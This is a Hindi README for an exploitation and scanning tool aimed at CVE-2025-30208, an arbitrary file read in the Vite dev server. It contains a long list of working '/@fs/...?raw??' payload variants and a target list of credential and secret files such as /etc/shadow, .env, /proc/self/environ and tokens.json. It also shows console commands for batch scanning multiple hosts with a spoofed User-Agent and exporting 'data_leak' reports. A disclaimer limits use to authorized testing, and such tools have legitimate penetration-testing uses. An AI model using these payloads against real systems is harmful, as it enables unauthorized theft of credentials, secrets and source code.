
CVE‑2025‑30208 Vite विकास सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमजोरी है।
CVE-2025-30208 के लिए उन्नत भेद्यता स्कैनर जिसमें एंटरप्राइज़-ग्रेड सुविधाएँ हैं
Vite मनमानी फ़ाइल पढ़ने की भेद्यता का पता लगाने के लिए पेशेवर पैठ परीक्षण उपकरण
🚀 त्वरित आरंभ • 📋 विशेषताएँ • 🔧 उपयोग • 📊 उदाहरण • 🛡️ सुरक्षा
यह एक व्यापक भेद्यता स्कैनर है जो Vite विकास सर्वरों में CVE-2025-30208 भेद्यता का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता Vite के फ़ाइल सिस्टम एंडपॉइंट के माध्यम से मनमानी फ़ाइल पढ़ने की पहुँच प्रदान करती है, जिससे संभावित रूप से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड और सिस्टम जानकारी उजागर हो सकती है।
उपकरण में अब बेहतर रखरखाव और विस्तारशीलता के लिए मॉड्यूलर आर्किटेक्चर है:
CVE-2025-30208.py - मुख्य स्कैनर एप्लिकेशनpayloads.py - उन्नत शोषण पेलोड (60+ विविधताएँ)sensitive_files.py - व्यापक संवेदनशील फ़ाइल डेटाबेस (200+ फ़ाइलें)html_template.py - उन्नत हैकर-शैली HTML रिपोर्टिंग टेम्पलेटpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# विस्तृत आउटपुट के लिए वर्बोज़ मोड सक्षम करें
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[समाप्त करने के लिए Enter दो बार दबाएँ]
CVE-2025-30208 > scan
# प्रॉक्सी कॉन्फ़िगर करें
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
# कस्टम हेडर सेट करें
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Custom Scanner"}
# दर सीमित करना कॉन्फ़िगर करें
CVE-2025-30208 > rate
दर सीमा दर्ज करें: 1.0
# सुंदर HTML रिपोर्ट जनरेट करें
CVE-2025-30208 > pull
# रिपोर्ट देखने के लिए वेब सर्वर शुरू करें
CVE-2025-30208 > web
# विशिष्ट पोर्ट पर वेब सर्वर शुरू करें
CVE-2025-30208 > web 8081
# वेब सर्वर बंद करें
CVE-2025-30208 > web off
स्कैनर अब payloads.py में संगठित 60+ विभिन्न पेलोड विविधताओं का उपयोग करता है:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
उपकरण अब sensitive_files.py में संगठित 200+ संवेदनशील फ़ाइलों का परीक्षण करता है:
/etc/passwd - उपयोगकर्ता खाता जानकारी/etc/shadow - एन्क्रिप्टेड पासवर्ड डेटा/etc/services - नेटवर्क सेवाएँ/etc/hosts - होस्टनाम मैपिंग/etc/fstab - फ़ाइल सिस्टम तालिका/etc/ssh/sshd_config - SSH सर्वर कॉन्फ़िगरेशन/etc/crontab - सिस्टम क्रॉन जॉब्स/etc/sudoers - Sudo कॉन्फ़िगरेशन/proc/version - कर्नेल संस्करण/proc/cpuinfo - CPU जानकारी/proc/meminfo - मेमोरी जानकारी/proc/self/environ - प्रक्रिया पर्यावरण/proc/self/cmdline - प्रक्रिया कमांड लाइन/proc/net/tcp - TCP कनेक्शन/proc/net/udp - UDP कनेक्शन.env - पर्यावरण चर.env.local - स्थानीय पर्यावरण.env.production - उत्पादन पर्यावरणconfig.json - एप्लिकेशन कॉन्फ़िगरेशनsettings.json - एप्लिकेशन सेटिंग्सapplication.properties - Spring कॉन्फ़िगरेशनapplication.yml - YAML कॉन्फ़िगरेशनdatabase.yml - डेटाबेस कॉन्फ़िगरेशनsecrets.json - गुप्त प्रबंधनpackage.json - Node.js निर्भरताएँpackage-lock.json - लॉक की गई निर्भरताएँyarn.lock - Yarn लॉक फ़ाइलvite.config.js - Vite कॉन्फ़िगरेशनvite.config.ts - TypeScript Vite configtsconfig.json - TypeScript कॉन्फ़िगरेशनwebpack.config.js - Webpack कॉन्फ़िगरेशनnext.config.js - Next.js कॉन्फ़िगरेशनnuxt.config.js - Nuxt.js कॉन्फ़िगरेशनangular.json - Angular कॉन्फ़िगरेशनvue.config.js - Vue.js कॉन्फ़िगरेशनrollup.config.js - Rollup कॉन्फ़िगरेशनeslint.config.js - ESLint कॉन्फ़िगरेशन.git/config - Git कॉन्फ़िगरेशन.gitignore - Git अनदेखा नियम.gitattributes - Git विशेषताएँ.gitmodules - Git उपमॉड्यूल.git/HEAD - वर्तमान शाखा.git/logs/HEAD - Git लॉग.git/refs/heads/master - मास्टर शाखा.git/refs/heads/main - मुख्य शाखाREADME.md - परियोजना दस्तावेज़ीकरणCHANGELOG.md - परिवर्तन लॉगLICENSE - लाइसेंस जानकारीCONTRIBUTING.md - योगदान दिशानिर्देशAUTHORS - लेखक जानकारीTODO.md - कार्य सूचीROADMAP.md - विकास रोडमैपDockerfile - Docker कॉन्फ़िगरेशनdocker-compose.yml - Docker Composedocker-compose.override.yml - ओवरराइड कॉन्फ़िगरेशन.dockerignore - Docker अनदेखा नियमdocker-compose.prod.yml - उत्पादन कॉन्फ़िगरेशनdocker-compose.dev.yml - विकास कॉन्फ़िगरेशनnginx.conf - Nginx कॉन्फ़िगरेशनapache2.conf - Apache कॉन्फ़िगरेशनhttpd.conf - HTTP डेमॉन कॉन्फ़िगरेशन.htaccess - Apache एक्सेस नियंत्रणweb.config - IIS कॉन्फ़िगरेशनrobots.txt - खोज इंजन निर्देशsitemap.xml - साइट संरचनाmanifest.json - वेब ऐप मैनिफेस्टsw.js - सेवा वर्करfirebase.json - Firebase कॉन्फ़िगरेशनfirebase.rules - Firebase सुरक्षा नियमboot.ini - बूट कॉन्फ़िगरेशनautoexec.bat - स्वचालित निष्पादन स्क्रिप्टsystem.ini - सिस्टम कॉन्फ़िगरेशनwin.ini - Windows कॉन्फ़िगरेशनUsers - उपयोगकर्ता निर्देशिकाएँWindows - सिस्टम फ़ाइलेंProgram Files - एप्लिकेशन निर्देशिकाएँSystem - सिस्टम फ़ाइलेंLibrary - लाइब्रेरी फ़ाइलेंApplications - एप्लिकेशन फ़ाइलेंprivate/etc/hosts - होस्ट फ़ाइलprivate/etc/passwd - उपयोगकर्ता खातेdatabase.db - SQLite डेटाबेसdatabase.sqlite - SQLite डेटाबेसdata.db - डेटा डेटाबेसdump.sql - डेटाबेस डंपschema.sql - डेटाबेस स्कीमाmigrations - डेटाबेस माइग्रेशनlogs - लॉग निर्देशिकाerror.log - त्रुटि लॉगaccess.log - एक्सेस लॉगapp.log - एप्लिकेशन लॉगdebug.log - डीबग लॉगcombined.log - संयुक्त लॉगbackup - बैकअप निर्देशिकाbackup.sql - डेटाबेस बैकअपbackup.zip - संपीड़ित बैकअपdump - डेटा डंपexport - डेटा निर्यातauth.json - प्रमाणीकरण कॉन्फ़िगरेशनcredentials.json - क्रेडेंशियल भंडारणkeys.json - कुंजी प्रबंधनtokens.json - टोकन भंडारणjwt.json - JWT कॉन्फ़िगरेशनoauth.json - OAuth कॉन्फ़िगरेशनapi.json - API कॉन्फ़िगरेशनswagger.json - API दस्तावेज़ीकरणopenapi.json - OpenAPI विनिर्देशनgraphql.json - GraphQL कॉन्फ़िगरेशनschema.json - API स्कीमाcloudformation.yml - AWS CloudFormationserverless.yml - सर्वरलेस कॉन्फ़िगरेशनterraform.tf - Terraform कॉन्फ़िगरेशनkubernetes.yml - Kubernetes कॉन्फ़िगरेशनk8s.yml - Kubernetes कॉन्फ़िगरेशनanalytics.json - एनालिटिक्स कॉन्फ़िगरेशनmonitoring.json - मॉनिटरिंग सेटअपmetrics.json - मीट्रिक्स कॉन्फ़िगरेशनtelemetry.json - टेलीमेट्री डेटाउपकरण अब सुंदर हैकर-शैली HTML रिपोर्ट जनरेट करता है जिसमें:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # मुख्य स्कैनर एप्लिकेशन
├── payloads.py # उन्नत शोषण पेलोड (60+)
├── sensitive_files.py # संवेदनशील फ़ाइल डेटाबेस (200+)
├── html_template.py # उन्नत HTML रिपोर्टिंग टेम्पलेट
├── README.md # यह दस्तावेज़ीकरण
├── requirements.txt # Python निर्भरताएँ
├── logs/ # लॉग फ़ाइल निर्देशिका
├── data_leak.html # जनरेट की गई HTML रिपोर्ट
├── data_leak.json # जनरेट की गई JSON रिपोर्ट
└── session.json # सहेजे गए सत्र कॉन्फ़िगरेशन
हम इस उपकरण को बेहतर बनाने के लिए योगदान का स्वागत करते हैं:
payloads.py में नई पेलोड विविधताएँsensitive_files.py में अतिरिक्त संवेदनशील फ़ाइल पैटर्नhtml_template.py में उन्नत HTML टेम्पलेटयह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए लाइसेंस प्राप्त है।
⚠️ कानूनी अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। किसी भी सिस्टम का परीक्षण करने से पहले उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि उनके पास उचित प्राधिकरण है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
⭐ यदि इस उपकरण ने आपकी मदद की, तो कृपया इसे एक स्टार दें! ⭐
सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
| कमांड | विवरण | उदाहरण |
|---|
set <option> <value> | कॉन्फ़िगरेशन विकल्प सेट करें | set RHOST 192.168.1.100 |
show options | वर्तमान सेटिंग्स प्रदर्शित करें | show options |
edit | इंटरैक्टिव विकल्प संपादक | edit |
run / exploit | भेद्यता परीक्षण चलाएँ | run |
batch | एकाधिक लक्ष्यों की बैच स्कैनिंग | batch |
scan | संवेदनशील फ़ाइलों की खोज | scan |
pull | परिणाम HTML/JSON में निर्यात करें | pull |
web [on|off|port] | HTML रिपोर्ट के लिए वेब सर्वर | web 8080 |
save | सत्र कॉन्फ़िगरेशन सहेजें | save |
load | सत्र कॉन्फ़िगरेशन लोड करें | load |
test | लक्ष्य से कनेक्टिविटी का परीक्षण करें | test |
validate | वर्तमान कॉन्फ़िगरेशन मान्य करें | validate |
verbose | वर्बोज़ मोड टॉगल करें | verbose |
proxy | प्रॉक्सी सेटिंग्स कॉन्फ़िगर करें | proxy |
headers | कस्टम HTTP हेडर सेट करें | headers |
rate | दर सीमित करना कॉन्फ़िगर करें | rate |
log | लॉगिंग जानकारी दिखाएँ | log |
help / ? | सहायता दिखाएँ | help |
exit / quit | उपकरण से बाहर निकलें | exit |
| विकल्प | विवरण | डिफ़ॉल्ट | सत्यापन |
|---|
RHOST | लक्ष्य होस्ट/IP पता | - | होस्टनाम/IP सत्यापन |
RPORT | लक्ष्य पोर्ट संख्या | - | पोर्ट रेंज (1-65535) |
FILEPATH | परीक्षण करने के लिए फ़ाइल पथ | etc/passwd | पथ सत्यापन |
PROXY | HTTP/HTTPS प्रॉक्सी URL | - | URL प्रारूप सत्यापन |
VERBOSE | वर्बोज़ आउटपुट सक्षम करें | false | बूलियन सत्यापन |
RATE_LIMIT | अनुरोधों के बीच विलंब (सेकंड) | 0.3 | संख्यात्मक सत्यापन |
THREADS | बैच स्कैनिंग के लिए थ्रेड्स की संख्या | 5 | पूर्णांक सत्यापन |
TIMEOUT | अनुरोध टाइमआउट (सेकंड) | 5 | पूर्णांक सत्यापन |
CUSTOM_HEADERS | कस्टम HTTP हेडर (JSON) | {} | JSON प्रारूप सत्यापन |
prettier.config.js - Prettier कॉन्फ़िगरेशनjest.config.js - Jest कॉन्फ़िगरेशनbabel.config.js - Babel कॉन्फ़िगरेशनtailwind.config.js - Tailwind CSS कॉन्फ़िगरेशन| फ़ाइल | विवरण | प्रारूप |
|---|
data_leak.html | उन्नत हैकर-शैली HTML भेद्यता रिपोर्ट | HTML |
data_leak.json | संरचित JSON निर्यात | JSON |
sensitive_files_discovery.json | खोजी गई संवेदनशील फ़ाइलें | JSON |
session.json | सहेजा गया सत्र कॉन्फ़िगरेशन | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | विस्तृत ऑडिट लॉग | टेक्स्ट |